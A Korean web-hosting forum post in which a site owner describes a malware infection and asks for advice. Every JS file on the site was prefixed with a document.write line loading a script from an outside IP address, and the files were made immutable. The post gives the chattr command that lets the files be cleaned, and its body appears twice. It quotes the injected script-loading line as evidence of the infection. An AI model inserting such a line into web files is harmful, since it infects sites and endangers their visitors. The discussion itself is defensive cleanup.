요새 악성코드때문에 고통받는 홈페이지들이 많습니다...
사례들이 여러가지 있을 것 같아 #1 붙여봤습니다.
#1.
js디렉토리의 모든 js파일의 첫 줄에 다음과 유사한 코드가 들어가있습니다.
document.write("<script src='http://61.57.227.5/js/x.js?GMXZZQ'></script>");
이렇게 되면 크롬, 사파리, 불여우에서는 악성코드 포함된 사이트라고 못들어가게 막죠... -_-
js파일을 삭제나 수정하려고 하면 읽기전용이라 안됩니다.
그럼 읽기전용을 해제해야죠..
다음과 같이 하심 됩니다.
js]# chattr -i *
이렇게 하면 읽기전용이 해제되고요~
js파일을 수정/삭제할 수 있습니다~~~
//-------------------------------------------------------
하지만 문제는...
위와 같은 현상이 발생한 원인을 찾아서 해결을 봐야 한다는 겁니다. 그렇지 않으면 같은 상황이 반복될테니까요...
제 경우엔 data/file 디렉토리와 파일들에 문제가 보이더군요...
일일이 찾아서 삭제한다고 했는데 놓친 파일이 있을 수도 있으니 스트레스만 쌓여 갑니다...
노하우 공유 부탁드립니다~ ^^
사례들이 여러가지 있을 것 같아 #1 붙여봤습니다.
#1.
js디렉토리의 모든 js파일의 첫 줄에 다음과 유사한 코드가 들어가있습니다.
document.write("<script src='http://61.57.227.5/js/x.js?GMXZZQ'></script>");
이렇게 되면 크롬, 사파리, 불여우에서는 악성코드 포함된 사이트라고 못들어가게 막죠... -_-
js파일을 삭제나 수정하려고 하면 읽기전용이라 안됩니다.
그럼 읽기전용을 해제해야죠..
다음과 같이 하심 됩니다.
js]# chattr -i *
이렇게 하면 읽기전용이 해제되고요~
js파일을 수정/삭제할 수 있습니다~~~
//-------------------------------------------------------
하지만 문제는...
위와 같은 현상이 발생한 원인을 찾아서 해결을 봐야 한다는 겁니다. 그렇지 않으면 같은 상황이 반복될테니까요...
제 경우엔 data/file 디렉토리와 파일들에 문제가 보이더군요...
일일이 찾아서 삭제한다고 했는데 놓친 파일이 있을 수도 있으니 스트레스만 쌓여 갑니다...
노하우 공유 부탁드립니다~ ^^
댓글 2개
게시글 목록
| 번호 | 제목 |
|---|---|
| 34021 | |
| 33994 | |
| 33922 | |
| 33895 | |
| 33889 | |
| 33882 | |
| 33868 |
최신글
최신글 함수 개량
11
|
| 33863 | |
| 33859 | |
| 33857 | |
| 33849 | |
| 33842 | |
| 33835 | |
| 33830 | |
| 33828 | |
| 33807 | |
| 33797 | |
| 33796 | |
| 33791 | |
| 33786 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기